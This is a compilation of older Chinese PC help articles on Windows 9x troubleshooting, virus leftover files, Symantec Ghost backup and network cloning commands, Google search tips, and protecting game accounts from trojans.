    故障解决：首先怀疑是“启动”项中的程序否太多从而影响速度，于是进入安全模式，运行msconfig.exe，只选择“启动”项中的某些项目（最后全部启动项都不选择），确定后再启动，问题如故。后来对win.ini（运行msconfig.exe后） 中的选项进行不同的设置，重新启动计算机仍解决不了问题。于是重装系统，WIN98重装了多次，每次安装到设置硬件和即插即用设备时总是不容易通过，重新启动计算机好几次方能完成安装。于是怀疑是否硬件有问题，但是经检查没发现什么问题，但为何以前系统（WIN95）能正常运行，而现在就不能了呢?只不过对CMOS放电而已（问题1中有过叙述），决不会损坏硬件的，而CMOS中的设置也是正确的，是否跟所装的操作系统有关，于是系统重装WIN95，居然一切OK!不管是开机速度还是运行速度都有了很大的改观（开机时间不到一分钟）。笔者认为这也许与早期的COMPAQ原装机对操作系统有所选择有关，因为COMPAQ原装机有自己的优化设计，对WIN95支持很好，而对WIN98的支持就不如WIN95了。笔者只是针对自己所用的机器而言，不同的机型可能有所差异，文中不正确或妄下结论之处，望批评指正! 有意交流者来信请寄：davidchangzheng@yahoo.com。


folder.htt等文件的问题

《一键清理系统垃圾》

folder.htt等文件的问题

Q12.2：最近在我的电脑的所有文件夹中出现了这样两个文件esktop.ini、folder.htt，怎么也删不去。有人说是病毒，把系统和别的分区全格式化了就好了。可是我的东西全都有用，不能格式化的，请问怎么办？

    A：你的电脑可能是感染了VBS.KJ脚本病毒。该病毒采用VBScript语言编写，在互联网上通过电子邮件进行传播，也可以通过文件感染；感染后的机器系统资源被大量消耗，速度变慢；利用Windows系统的“资源管理器”进行寄生与感染。在每个检查到的文件夹下生成desktop.ini和folder.htt文件(隐藏属性)。并且，该病毒还会修改注册表的许多键值。手工删除比较困难，建议采用杀毒软件杀毒，这样可以避免格式化你的硬盘，保护你的数据。金山公司反病毒应急处理中心的《新欢乐时光》专杀工具效果比较好，并提供免费下载，下载链接ftp://www.iduba.net/download/othertools/scanvbskj.exe大小仅56KB！


found.000文件夹的问题

《一键清理系统垃圾》

found.000文件夹的问题

问：我的电脑有的时候在C盘或D盘的根目录下有个名为found.000的文件夹，里面有一些后缀名为CHK的文件。在c:\windows下有很多以fff开头的怪文件，而且大小全部为0字节。请问这些是什么文件？能否将它们删除？

    答：found.000文件夹里面的一些后缀名为CHK的文件是你在使用“磁盘碎片整理程序”整理硬盘后所产生的“丢失簇的恢复文件”。在c:\windows下有很多以fff开头的文件是由Mdm.exe(Machine Debug Manager)这个程序产生的。Mdm.exe的主要工作是针对应用软件进行排错(Debug)，在排错过程中会产生一些暂存文件，这些文件在操作系统进行关机时没有自动被清除，所以这些fff开头的怪文件和found.000文件夹里面的一些后缀名为CHK的文件都是没有用的垃圾文件，可以任意删除而不会对系统产生不良影响。

    但只要系统中有Mdm.exe存在，那么以fff开头的怪文件就又有可能产生。你可以按下面的方法让系统停止运行Mdm.exe来彻底删除以fff开头的怪文件：首先按“Ctrl+Alt+Del”组合键，在弹出的“关闭程序”窗口中选中“Mdm”，按“结束任务”按钮来停止Mdm.exe在后台的运行，接着把Mdm.exe(在C:\Windows\System目录下)改名为Mdm.bak。运行msconfig程序，在启动页中取消对“Machine Debug Manager”的选择。这样可以不让Mdm.exe自启动，然后点击“确定”按钮，结束msconfig程序，并重新启动电脑。另外，如果你使用IE 5.X，建议禁用脚本调用(点击“工具→Internet选项→高级→禁用脚本调用”)，这样就可以避免以fff开头的怪文件再次产生。


Ghost 使用详解

《一键清理系统垃圾》

Ghost 使用详解

-------------------------------------------------------------------------------- 一、分区备份

    使用Ghost进行系统备份，有整个硬盘（Disk）和分区硬盘（Partition）两种方式。在菜单中点击 Local（本地）项，在右面弹出的菜单中有3个子项，其中 Disk表示备份整个硬盘（即克隆）、Partition 表示备份硬盘的单个分区、Check 表示检查硬盘或备份的文件，查看是否可能因分区、硬盘被破坏等造成备份或还原失败。分区备份作为个人用户来保存系统数据，特别是在恢复和复制系统分区时具有实用价值。

    选 Local→Partition→To Image 菜单，弹出硬盘选择窗口，开始分区备份操作。点击该窗口中白色的硬盘信息条，选择硬盘，进入窗口，选择要操作的分区（若没有鼠标，可用键盘进行操作：TAB键进行切换，回车键进行确认，方向键进行选择）。 在弹出的窗口中选择备份储存的目录路径并输入备份文件名称，注意备份文件的名称带有 GHO 的后缀名。 接下来，程序会询问是否压缩备份数据，并给出3个选择：No 表示不压缩，Fast表示压缩比例小而执行备份速度较快，High 就是压缩比例高但执行备份速度相当慢。最后选择 Yes 按钮即开始进行分区硬盘的备份。Ghost 备份的速度相当快，不用久等就可以完成，备份的文件以 GHO 后缀名储存在设定的目录中。

二、硬盘克隆与备份

    硬盘的克隆就是对整个硬盘的备份和还原。选择菜单Local→Disk→To Disk，在弹出的窗口中选择源硬盘（第一个硬盘），然后选择要复制到的目标硬盘（第二个硬盘）。注意，可以设置目标硬盘各个分区的大小，Ghost 可以自动对目标硬盘按设定的分区数值进行分区和格式化。选择 Yes 开始执行。

    Ghost 能将目标硬盘复制得与源硬盘几乎完全一样，并实现分区、格式化、复制系统和文件一步完成。只是要注意目标硬盘不能太小，必须能将源硬盘的数据内容装下。

    Ghost 还提供了一项硬盘备份功能，就是将整个硬盘的数据备份成一个文件保存在硬盘上（菜单 Local→Disk→To Image），然后就可以随时还原到其他硬盘或源硬盘上，这对安装多个系统很方便。使用方法与分区备份相似。

三、备份还原

    如果硬盘中备份的分区数据受到损坏，用一般数据修复方法不能修复，以及系统被破坏后不能启动，都可以用备份的数据进行完全的复原而无须重新安装程序或系统。当然，也可以将备份还原到另一个硬盘上。 　　要恢复备份的分区，就在界面中选择菜单Local→Partition→From Image，在弹出窗口中选择还原的备份文件，再选择还原的硬盘和分区，点击 Yes 按钮即可。

四、局域网操作

LPT 是通过并口传送备份文件,下面有两个选项：slave 和 master, 分别用以连接主机和客户机。 网络基本输入输出系统 NetBios 和 LPT 相似, 也有 slave 和 master 两个选项, 作用与 LPT 相同。

先和平时一样将要 ghost 的分区做成一个 *.gho 文件，再在一台 win98 上安装Symantec Ghost 企业版，重启。

1. 首先制作一张 ghost 带网卡驱动的启动盘。Start > Programs > Symantec Ghost > Ghost Boot Wizard－>Network Boot Disk 如果你的网卡在列表内直接选择它就可以生成一张带 PC-DOS 的启动盘。（但 6.5版的生成的软盘经常有问题，不能成功启动）如果你的网卡不在列表内，你要建立专用的 Packet Driver。ADD->Packet Driver (网卡的驱动程序中有)往下根据提示一步一步走，填入工作站的 ip（ghost 一定要 tcp/ip 协议）。最后生成一张软盘，但此软盘仍不能使用，要改 autoexec.bat 文件在 net xxxx.dos 后面加一个16进制的地址，如 0X75 等。多台计算机只需改 wattcp.cfg 文件中的 ip 即可:

IP = 192.168.100.44 NETMASK = 255.255.255.0

GATEWAY = 192.168.100.1

2. 在 server 端运行 multicast server 出来的画面。先给 server一个Session Name（别名）如：bb，再选择 image file 就是你的 gho 文件。然后 －>Dump From Client->rtitions->More Options-> 在 auto start 的 client 中填入 50（如果你要同时复制50台）->accept client 就算完成了，当你的工作站数达到50台时，server就自动传送*.gho 文件。

3.详述：

目前，相当多的电子教室都采用了没有软驱、光驱的工作站。在没有软驱、光驱的情况下，当硬盘的软件系统出现问题时，能否实现网络硬盘克隆呢？PXE（Preboot Execution Environment，它是基于 TCP/IP、DHCP、TFTP 等 Internet 协议之上的扩展网络协议）技术提供的从网络启动的功能，让我们找到了解决之道。下面，我们就来讲解怎样采用Ghost 7.0来实现基于 PXE 的网络硬盘克隆。

    网络硬盘克隆过程简述

    网络硬盘克隆过程为：在装有软驱的工作站上，用一张引导盘来启动机器，连接到服务器，使用 Ghost 多播服务（Multicast Server）将硬盘或分区的映像克隆到工作站，这样就实现了不拆机、安全、快速的网络硬盘克隆。

    实现 PXE 网络启动方式

对于没有软驱、光驱的工作站，要实现PXE网络启动方式，需要完成三个步骤：

    1、工作站的PXE启动设置

    PXE网络启动一般要求在网卡上加装 PXE 启动芯片（PXE Boot ROM）；对于某些型号的网卡，也可以将 PXE 启动代码（Boot Code）写入主板的 Flash ROM；而一些主板上集成了网卡的品牌机（例如清华同方的商用机），可直接支持PXE启动。

    常用的 RTL8139 芯片的网卡，其 PXE 启动设置方式是：机器启动时根据屏幕提示按下Shift+F10，在启动类型中选择PXE，开启网络启动选项即可。

    2、制作 PXE 启动文件

    制作 PXE 的启动文件，推荐使用 3Com 的 DABS（Dynamic Access Boot Services）。DABS 提供了功能强大的 PXE 启动服务、管理功能，但是，网上可供下载的是一个30天的试用版。所以，我们只用它的启动映像文件制作功能，而由 Windows 2000 Server 的 DHCP 服务器来提供 PXE 启动服务。

    DABS 可以安装在任何一台运行 Windows 的机器上。安装后，运行 3Com Boot Image Editor，出现主界面图。选择“创建TCP/IP或PXE映像文件（Create a TCP/IP or PXE image file）”，出现对话窗口。为即将建立的映像文件命名，例如：pxeghost.img，其他采用默认选项，将经测试正常的网络启动盘放入软驱，选择[OK]，创建PXE启动映像 Pxeghost.img文件。

    在 3Com Boot Image Editor 的主菜单中，选择“创建PXE菜单启动文件（Creat a PXE menu boot file）”，在出现的窗口中选择[添加（Add）]，加入我们刚刚创建的启动映像文件Pxeghost.img，在“选项（Options）”标签中可以设置菜单标题和等待时间。

    选择[保存（Save）]，给保存的PXE菜单启动文件命名为 Pxemenu.pxe。

    3、服务器的PXE启动服务设置

    Windows 2000 Server 的 DHCP 服务支持两种启动协议：DHCP 和 BOOTP。我们可以设定以下三种选择：仅 DHCP、仅 BOOTP、两者。如果我们的局域网中由其他的 DHCP 服务器提供动态 IP 地址分配，那么这里选“仅BOOTP”即可；如果需要这台服务器提供动态 IP 地址分配，则需要选“两者”。

    接下来，设置启动文件名。在DHCP服务器的作用域选项中配置选项“067:启动文件名”，字串值为我们创建的 PXE 菜单启动文件名 Pxemenu.pxe。注意：文件名不包含路径。

    DHCP 服务器只是将启动文件名通知给 BOOTP 客户机，客户机通过什么方式下载启动文件呢？答案是，需要 TFTP 服务。3Com 的 DABS 包含了一个 TFTP 服务组件，当然，也可以下载一个免费的 TFTP 服务器软件长期使用。

    在 TFTP 服务器的设置中，规定一个服务目录。将制作的 PXE 启动文件 Pxeghost.img、Pxemenu.pxe 放到 TFTP 的服务目录中。TFTP 服务器设置为自动运行。

    用 Ghost 多播克隆硬盘

    现在运行 Ghost 多播服务器，任务名称为 Restore。设置完毕，按下[接受客户（Accept Clients）]按钮。启动要接受硬盘克隆的无软驱工作站，如果以上步骤操作无误，应该能够实现 PXE 启动，加入到多播克隆的任务当中。所有的目标工作站连接到本次任务之后，按下[发送（Send）]按钮，开始克隆任务。

五、参数设置

在 Options 中可以设置参数。下面简单介绍一下:

1．image write buffering：在建立备份文件时, 打开写缓冲； 2．sure：选择此项后, 不再会出现最终确认询问 (建议不要选择此项)；

3．no int 13：选择此项后, 不支持中断 13 (缺省时不选择)；

4．reboot：在对硬盘或者分区操作完成之后, 自动重启计算机；

5．spanning：通过多个卷架构备份文件 (选择此项时, 关闭 write buffering)；

6．autoname：自动为 spanning 文件命名；

7．allow 64k fat clusters：允许使用 64K FAT 簇 (仅在 Windows NT 中支持)；

8．ignore CRC errors：忽略 CRC 错误；

9．override size limit：如果出现分区大小不相配, 可忽略执行；

10．image read buffering：打开生成备份文件时的读缓存 (缺省时选中此项)。 六、软件特性

1.存贮介质

    Ghost 支持的存储介质超出了我们的想象，它支持对等 LPT 接口、对等 USB 接口、对等 TCP/IP 接口、SCSI磁带机、便携式设备（JAZ、ZIP、MO等）、光盘刻录机（CDR、CDRW）等。而这些特性不需要任何外带的驱动程序和软件，只需一张软盘就可以做到！特别是对光盘刻录机的支持，如今的刻录机和空白光盘都十分便宜，非常适合作备份的用途。

2.兼容性

    Ghost 对现有的操作系统都有良好的支持，包括 FAT16、FAT32、NTFS、HPFS、UNIX、NOVELL 等文件存储格式。同以前版本不同的是，Ghost 2001 加入了对 Linux EX2的支持（FIFO 文件存储格式），这也就意味着 Linux 的用户也可以用 Ghost 来备份系统了。

3.配套软件

    A.Ghost 浏览器 在以前的 Ghost版本中，我们只能对整个系统进行简单的备份、复制、还原，要恢复单个的文件和文件夹还要使用外带的 GhostEXP 软件。现在，Symantec 公司已经将 Ghost 浏览器整合在软件中。Ghost 浏览器采用类似于资源管理器的界面，通过它，我们可以方便迅速地在备份包中找出我们想要的文件和文件夹并还原。

使用Explorer可以备份整个硬盘或单个硬盘分区，点击工具栏上的圆柱形图标，弹出硬盘或分区选择对话窗口，然后再选择备份文件的储存目录并输入名称即可完成。要注意的是，非注册用户不能使用备份这项功能。

在 Ghost Explorer 中管理硬盘备份文件就非常方便了。首先选择打开一个备份文件(File/Open)，这时备份中的文件就像资源管理器一样在程序界面窗口中列出，可以在其中非常方便地查看、打开文件，也可以查找文件，或者将某个文件删除(但不能删除目录)。

在 Ghost Explorer 中提供了多种还原硬盘备份文件的方法，最方便的方法是使用鼠标右键点击某个文件，在弹出菜单中选择 Restore，然后输入要还原到的目录，这样，单个文件就从整个磁盘备份中还原出来了。当然，如果要还原整个磁盘备份，只需选择左面目录列表栏中最上面的带磁盘图标的目录项，然后点击工具栏中的还原图标 (第二个) 就可以了。

B.GDisk

GDisk 是一个新加入的实用工具，它彻底取代了 FDisk 和 Format，功能有：

* 快速格式化。

* 隐藏和显示分区。此功能允许一个以上的主 DOS分区，并且每个分区上的操作系统有不同的版本。隐藏分区的能力使计算机习惯于引导到选定的可引导分区，忽略其他隐藏分区中相同操作系统的安装。

* 全面的分区报告。

* 高度安全的磁盘擦除。提供符合美国国防部标准和更高安全标准的磁盘擦除选项。

与使用交互式菜单的 FDisk 不同，GDisk是由命令行驱动的。这提供了更快的配置磁盘分区和在批处理文件中定义 GDisk操作的能力。但与此同时，几十个参数会令普通用户头疼，因此笔者不推荐一般用户使用，Symantec 公司也应该推出相应的GUI（图形用户界面）控制台以方便用户使用。具体的参数说明可以用命令行 gdisk/? 了解。

C.Live Update

Live Update 是 Symantec公司软件的一个通用升级程序，它能够检查当前系统中已安装的 Symantec 软件，并且通过英特网对软件进行在线升级。 在安装 Ghost 2001 时，安装程序自动升级了 Live Update 程序的版本。

七、命令行参数：（Ghost 的无人 备份/恢复/复制 操作）

    其实 Ghost 2001 的功能远远不止它主程序中显示的那些，Ghost 可以在其启动的命令行中添加众多参数以实现更多的功能。命令行参数在使用时颇为复杂，不过我们可以制作批处理文件，从而“一劳永逸”（类似于无人安装 Windows 98 和Windows 2000）。现在让我们来了解一些常用的参数（了解更加详细的参数介绍可查看 Ghost 的帮助文件）。

1.-rb

本次 Ghost 操作结束退出时自动重启。这样，在复制系统时就可以放心离开了。

2.-fx

本次 Ghost 操作结束退出时自动回到DOS提示符。

3.-sure

对所有要求确认的提示或警告一律回答“Yes”。此参数有一定危险性，只建议高级用户使用。

4.-fro

如果源分区发现坏簇，则略过提示而强制拷贝。此参数可用于试着挽救硬盘坏道中的数据。

5.@filename

在 filename 中指定 txt 文件。txt文件中为 Ghost 的附加参数，这样做可以不受DOS命令行 150 个字符的限制。

6.-f32

将源 FAT16 分区拷贝后转换成 FAT32（前提是目标分区不小于 2G）。WinNT 4 和Windows95、97用户慎用。

7.-bootcd

当直接向光盘中备份文件时，此选项可以使光盘变成可引导。此过程需要放入启动盘。

8.-fatlimit

将 NT 的 FAT16 分区限制在 2G。此参数在复制 Windows NT 分区，且不想使用64k/簇的 FAT16 时非常有用。

9.-span

分卷参数。当空间不足时提示复制到另一个分区的另一个备份包。

10.-auto

分卷拷贝时不提示就自动赋予一个文件名继续执行。

11.-crcignore

忽略备份包中的 CRC ERROR。除非需要抢救备份包中的数据，否则不要使用此参数，以防数据错误。

12.-ia

全部映像。Ghost 会对硬盘上所有的分区逐个进行备份。

13.-ial

全部映像，类似于 -ia 参数，对 Linux 分区逐个进行备份。

14.-id

全部映像。类似于 -ia 参数，但包含分区的引导信息。

15.-quiet

操作过程中禁止状态更新和用户干预。

16.-script

可以执行多个 Ghost 命令行。命令行存放在指定的文件中。

17.-split=x

    将备份包划分成多个分卷，每个分卷的大小为 x兆。这个功能非常实用，用于大型备份包复制到移动式存储设备上，例如将一个 1.9G 的备份包复制到 3 张刻录盘上。

18.-z

    将磁盘或分区上的内容保存到映像文件时进行压缩。-z 或 -z1 为低压缩率（快速）；-z2 为高压缩率（中速）；-z3 至 -z9 压缩率依次增大（速度依次减慢）。

19.-clone

    这是实现 Ghost 无人备份/恢复的核心参数。使用语法为： -clone,MODE=(operation),SRC=(source),DST=(destination),[SZE(size),SZE(size)...]

此参数行较为复杂，且各参数之间不能含有空格。其中 operation意为操作类型，值可取：copy：磁盘到磁盘；load：文件到磁盘；dump：磁盘到文件；pcopy：分区到分区；pload：文件到分区；pdump：分区到文件。

    Source 意为操作源，值可取：驱动器号，从1开始；或者为文件名，需要写绝对路径。

Destination 意为目标位置，值可取：驱动器号，从 1开始；或者为文件名，需要写绝对路径；@CDx，刻录机，x 表示刻录机的驱动器号，从1开始。

下面举例说明：

1.命令行参数：ghostpe.exe -clone,mode=copy,src=1,dst=2 完成操作：将本地磁盘1复制到本地磁盘2。

2.命令行参数：ghostpe.exe -clone,mode=pcopy,src=1:2,dst=2:1 完成操作：将本地磁盘1上的第二分区复制到本地磁盘2的第一分区。

3.命令行参数：

ghostpe.exe-clone,mode=load,src=g:\3prtdisk.gho,dst=1,sze1=450M,sze2=1599M,sze3=2047M

完成操作：从映像文件装载磁盘1，并将第一个分区的大小调整为450MB，第二个调整为1599MB，第三个调整为2047MB。

4.命令行参数：ghostpe.exe

-clone,mode=pdump,src2:1:4:6,dst=d:\prt246.gho 完成操作：创建仅含有选定分区的映像文件。从磁盘2上选择分区1、4、6。

八、一些示例

ghost.exe -clone,mode=copy,src=1,dst=2 -sure 硬盘对拷

ghost.exe -clone,mode=pcopy,src=1:2,dst=2:1 -sure 将一号硬盘的第二个分区复制到二号硬盘的第一个分区

ghost.exe -clone,mode=pdump,src=1:2,dst=g:\bac.gho 将一号硬盘的第二个分区做成映像文件放到 g 分区中

ghost.exe -clone,mode=pload,src=g:\bac.gho:2,dst=1:2 从内部存有两个分区的映像文件中，把第二个分区还原到硬盘的第二个分区

ghost.exe -clone,mode=pload,src=g:\bac.gho,dst=1:1 -fx -sure -rb 用 g 盘的 bac.gho 文件还原 c 盘。完成后不显示任何信息，直接启动

ghost.exe -clone,mode=load,src=g:\bac.gho,dst=2,SZE1=60P,SZE2=40P 将映像文件还原到第二个硬盘，并将分区大小比例修改成 60:40

自动还原磁盘：

首先做一个启动盘，包含 Config.sys, Autoexec.bat, Command.com, Io.sys, Ghost.exe 文件(可以用 windows 做启动盘的程序完成)。Autoexec.bat 包含以下命令：

Ghost.exe -clone,mode=pload,src=d:\bac.gho,dst=1:1 -fx -sure -rb 利用在 D 盘的文件自动还原，结束以后自动退出 ghost 并且重新启动。 自动备份磁盘：

ghost.exe -clone,mode=pdump,src=1:1,dst=d:\bac.gho -fx -sure -rb 自动还原光盘：

包含文件：Config.sys, Autoexec.bat, Mscdex.exe (CDROM 执行程序), Oakcdrom.sys (ATAPI CDROM 兼容驱动程序), Ghost.exe。

Config.sys 内容为： DEVICE=OAKCDROM.SYS /D:IDECD001 Autoexec.bat 内容为：

MSCDEX.EXE /D:IDECE001 /L:Z Ghost -clone,mode=load,src=z:\bac.gho,dst=1:1 -sure -rb

可以根据下面的具体说明修改示例：

1.-clone

-clone 在使用时必须加入参数，它同时也是所有的 switch{batch switch} 里最实用的。下面是 clone 所定义的参数：

mode={copy|load|dump|pcopy|pload|pdump},

src={drive|file|driveartition},

dst={drive|file|driveartition}

mode 指定要使用哪种 clone 所提供的命令

copy 硬盘到硬盘的复制 (disk to disk copy)

load 文件还原到硬盘 (file to disk load)

dump 将硬盘做成映像文件 (disk to file dump)

pcopy 分区到分区的复制 (partition to partition copy)

pload 文件还原到分区 (file to partition load)

pdump 分区备份成映像文件（partition to file dump)

src 指定了 ghost 运行时使用的源分区的位置模式及其意义。对应 mode 命令 src 所使用参数例子:

COPY/DUMP 源硬盘号。以 1 代表第一号硬盘

LOAD 映像文件名。g:/back98/setup98.gho 或装置名称 (drive）

PCOPY/PDUMP 源分区号。1:2 代表的是硬盘１的第二个分区

PLOAD 分区映像文件名加上分区号或是驱动器名加上分区号。g:\back98.gho:2 代表映像文件里的第二个分区

dst 指定运行 Ghost 时使用的目标位置模式及其意义。对应 mode 命令 dst 所使用参数例子：

COPY/DUMP 目的硬盘号。2 代表第二号硬盘

LOAD 硬盘映像文件名。例 g:\back98\setup98.gho

PCOPY/PLOAD 目的分区号。2:2 代表硬盘 2 的第二个分区

PDUMP 分区映像文件名加分区号。g:\back98\setup98.gho:2

SZEn 指定所使用目的分区的大小：

n=xxxxM 指定第 n 目的分区的大小为 xxxxMB。如 SZE2=800M 表示分区 2 的大小为 800MB

n=mmP 指定第 n 目的分区的大小为整个硬盘的 mm 个百分比。

2.-fxo 当源物件出现坏块时，强迫复制继续进行

3.-fx 当ghost完成新系统的工作后不显示 press ctrl-alt-del to reboot 直接回到DOS下

4.-ia 完全执行扇区到扇区的复制。当由一个映像文件或由另一个硬盘为来源，复制一个分区时，Ghost将首先检查来源分区，再决定是要复制文件和目录结构还是要做映像复制(扇区到扇区)。预设是这种形式。但是有的时候，硬盘里特定的位置可能会放一些隐藏的与系统安全有关的文件。只有用扇区到扇区复制的方法才能正确复制

5.-pwd and -pwd=x 给映像文件加密

6.-rb 在还原或复制完成以后，让系统重新启动

7.-sure 可以和 clone 合用。Ghost 不会显示 proceed with disk clone-destination drive will be overwritten? 提示信息

九、注意事项

1.在备份系统时，单个的备份文件最好不要超过 2GB。

2.在备份系统前，最好将一些无用的文件删除以减少Ghost文件的体积。通常无用的文件有：Windows 的临时文件夹、IE 临时文件夹、Windows 的内存交换文件。这些文件通常要占去100 多兆硬盘空间。

3.在备份系统前，整理目标盘和源盘，以加快备份速度。

4.在备份系统前及恢复系统前，最好检查一下目标盘和源盘，纠正磁盘错误。

5.在恢复系统时，最好先检查一下要恢复的目标盘是否有重要的文件还未转移，千万不要等硬盘信息被覆盖后才后悔莫及啊。

6.在选择压缩率时，建议不要选择最高压缩率，因为最高压缩率非常耗时，而压缩率又没有明显的提高。

7.在新安装了软件和硬件后，最好重新制作映像文件，否则很可能在恢复后出现一些莫名其妙的错误。


Google搜索引擎的十大应用

《一键清理系统垃圾》

Google搜索引擎的十大应用

    1、汉语拼音输入检索

    为了方便使用中文的用户在网上搜索，Google允许用户直接在键盘上输入汉语拼音来检索相关事物，例如：

    输入　shanghaishikebiao

    检索结果提示：您是不是要找：上海时刻表

    这正是我们需要查找的关键词，用户可以据此浏览相关结果，这包括上海地区的各种交通工具的时刻表。如果需要查找更详细的资料“上海飞机航班时刻表”，则只要在原来的检索结果“上海时刻表”中间输入feijihangban，例如：

    上海feijihangban时刻表

    Google的这项新功能，可以免除用户在中文和拼音输入方面的互相转换。用户在输入拼音时，不要留有空格，否则Google会误认为英文。Google把拼音与常用的字或者词组一一对应，因此，过于生僻的字或词组不适合于用这个方法查找。

    2、中英文字典

    经常使用计算机的用户手头上自然会有一、两个字典软件，用于查找和翻译中英文的词义。作为一种使用频率较高的工具，Google也提供了一个中英文字典，很方便使用。用户可以按照下列方法查找词义查找英文的中文词义则输入fy　computer查找中文的英文词义则输入　翻译　计算机

    3、天气查询

    天气情况也是人们经常要查询的信息之一，Google　提供的天气查询来自于一个更新及时的中文气象网站，适合中国人使用。用户输入中文和英文都可以查询，例如要了解奥运会期间雅典的天气情况，可以按照下列方法输入：

    雅典　天气　　athens tq　返回的查询结果中会在第一条出现一个　“雅典天气预报”，用户点击后就可以看到当天雅典的天气情况。如果地名相同者，用户还需要进行一次选择。

    4、股票查询

    查询股票的网站已经很多了，Google提供的股票查询只是更方便一些而已，用户可以按照股票名称、股票代码或者股票名称的声母字母查询，下列为查询“中国联通”股票行情的举例。

    中国联通　股票　zglt gp

    gp 600050

    5、邮政编码和区号查询

    人们时常需要查询邮政编码和电话区号，Google提供了这样一个实用的功能，用户据此能够获得所要查询的省市名称，邮政编码及长途电话区号，下面为查询举例：

    邮编　杭州

    区号　绍兴

    yb　　杭州

    qh　　绍兴

    需要注意的是用户只能查询到城市级别的邮政编码和区号，而无法进一步查询区县的具体信息。

    6、手机归属地查询

    用户在输入手机号码后可以获得号码段、归属地、卡类型、邮政编码和电话区号的信息，但是从实用的角度看，其中只有手机归属地的信息较为有用。

    7、计算器使用

    Google有计算器的功能，例如在google检索框中输入45*86+35/7，就会得到结果：

    (45　*　86)　+　(35　/　7)　=　3 875

    有兴趣的用户，或者经常在计算机上进行运算的用户不妨可以试一试。

    8、购物检索

    Google新开设的购物检索称之为Froogle，网址为http：//froogle。google。com/

    用户只要输入商品的名称，就可以看到该商品的图片和价格，用户还可以限定一种商品的价格进行检索，并且将检索结果按需要从高价到低价排序列出，许多商品可以直接在网上订购，这种图文并茂的检索购物方式较受用户青睐。

    9、美国实用生活信息查询

    如果用户生活在美国或者短期去美国出差和学习，下面的查询功能或许能对他们又帮助，因为这些检索服务目前仅限于美国。

    9.1　地区代码查询

    用户输入美国的地区代码，在返回的检索结果中的第一项就是该地区的地图，用户可以通过不断的点击来找到一条具体的大街。

    9.2　条形码查询

    用户输入一个商品的条形码就可以找到有关该产品的说明。

    9.3　飞机航班查询

    用户输入一家航空公司的名称和航班号，即可获得该航班的出发地和目的地，起飞和到达时间，以及实际航行情况，目前是否开始检票，抵达目的地候机大楼的舱门号。

    9.4　车牌号查询

    用户输入车牌号，可以获得一辆车的名称、型号、出厂年份，车身和发动机情况。

    9.5　邮件查询

    用户输入一个邮件的号码，可以获悉该邮件目前的状况，譬如邮件已经抵达或者正在路途上等。

    10、检索工具栏

    Google的检索工具栏功能强大，有拖放和右击检索功能，新闻阅读，广告拦截，网站排名显示和搜索字词标明等，工具栏可以附在浏览器下，使用更加方便。用户可以首先在Google网站下载并安装一个检索工具栏，然后根据需要在工具栏的选项中进行设置，我们推荐用户使用这个检索工具栏，它将给用户带来许多意想不到的方便。

    10.1 Google　新闻

    Google　的新闻来源于4500家报刊杂志和通讯社，在精选以后持续播出世界各国的新闻，每条新闻都有更新的时间，并联接相关的新闻。用户可以使用免费的新闻通知服务，通过电子邮件收到自己感兴趣的新闻。

    10.2　网站排名

    Google　通过对　Web　链接结构和许多其它变量自动计算，对网页的重要程度进行评定。网站排名根据这个评定能够显示用户正在访问的网站的重要程度，用一根绿色线条显示，直观而明确。

    10.3　搜索字词标明

    搜索字词标明通过鲜艳的色彩标明用户所检索的字词在每个网页上的位置，便于用户查阅，单击“搜索字词标明”按钮可以打开和关闭标明状态。

    10.4　拖放和右击检索

    拖放检索功能使检索更为方便，用户可以把在网页上所选取的字词直接拖放到检索框中，Google会自动进行检索。对于与　Web浏览器同时运行的许多文字处理应用程序中的文字，也可以使用此功能。右击检索是指用户可以在网页上选取文字后，右击鼠标，然后从弹出式菜单中选择“Google　搜索”便可以自动检索。


ID丢失的途径及如何防止ID被盗

《一键清理系统垃圾》

ID丢失的途径及如何防止ID被盗

    现在越来越多的玩家ID被盗被黑~~如何才能防止呢？我现在把我的一些经验介绍一下~~希望给大家一些帮助，高手们不要丢鸡蛋哦~

    现在ID丢失不外乎以下几种途径：

    1、自己不小心，把自己的帐号和密码告诉自己从来没有见过但是在网上觉得比较信任的人，这种情况下造成的丢失神仙也救不了你~~算自己倒霉吧~~谁叫自己交友不慎呢~　:-(

    2、使用拨号上网的朋友们丢失ID的可能性比较小，拨号上网的速度虽然慢，但是我认为相对使用宽带（特别是局域网接入）还是比较安全的~~但是需要注意的是一定要记得把NETBIOS关闭。

    关闭方法是：首先在网络配置中看有没有NETBEUI，没有的话就要添加，网络协议中选微软和NETBEUI；再在网络中选拨号网络适配器，在属性对话框中选择绑定项，只选此项中的TCP/IP->网络适配器；回到网络对话框，选中TCP/IP->拨号网络适配器，点击列表右下方属性按钮，不要怕弹出的警告对话框，选定。在TCP/IP属性对话框中选择绑定标签页，将列表中所有项目前复选框中的对勾都取消！点击确定，这时Windows会警告你尚未选择绑定的驱动器，现在是否选择驱动器？点击否。之后，系统会提示重新启动计算机，确认，就可以了。

    宽带接入的一定不要将自己的文件或硬盘设置成共享~~哪怕只读也不可以~~也要将NETBIOS关闭，关闭方法类似与拨号上网。

    3、计算机被安装特伊洛木马软件，如Sub7、BO2000、冰河等木马都有强大的控制功能，现在的冰河4.0版本可以绕过国内某些号称最厉害的杀毒软件。

    一般的木马都有客户端和服务器端两个执行程序，其中客户端是用于攻击者远程控制植入木马的机器，服务器端程序即是木马程序。攻击者要通过木马攻击你的系统，他所做的第一步是要把木马的服务器端程序植入到你的电脑里面。

    目前木马入侵的主要途径还是先通过一定的方法把木马执行文件弄到被攻击者的电脑系统里，如邮件、下载等，然后通过一定的提示故意误导被攻击者打开执行文件，比如故意谎称这是个木马执行文件是你朋友送给你贺卡，可能你打开这个文件后，确实有贺卡的画面出现，但这时可能木马已经悄悄在你的后台运行了。

     一般的木马执行文件非常小，大到都是几K到几十K，如果把木马捆绑到其它正常文件上，你很难发现的，所以，有一些网站提供的软件下载往往是捆绑了木马文件的，在你执行这些下载文件的同时也运行了木马。因此一定要从可靠的站点下载，也不要运行来历不明的邮件附件。

    木马也可以通过Script、ActiveX及Asp、Cgi交互脚本的方式植入，由于微软的浏览器在执行Script脚本上存在一些漏洞，攻击者可以利用这些漏洞传皤病毒和木马，甚至直接对浏览者电脑进行文件操作等控制，前不久就出现一个利用微软Scripts脚本漏洞对浏览者硬盘进行格式化的Html页面。如果攻击者有办法把木马执行文件上载到攻击主机的一个可执行WWW目录夹里面，他可以通过编制Cgi程序在攻击主机上执行木马目录。

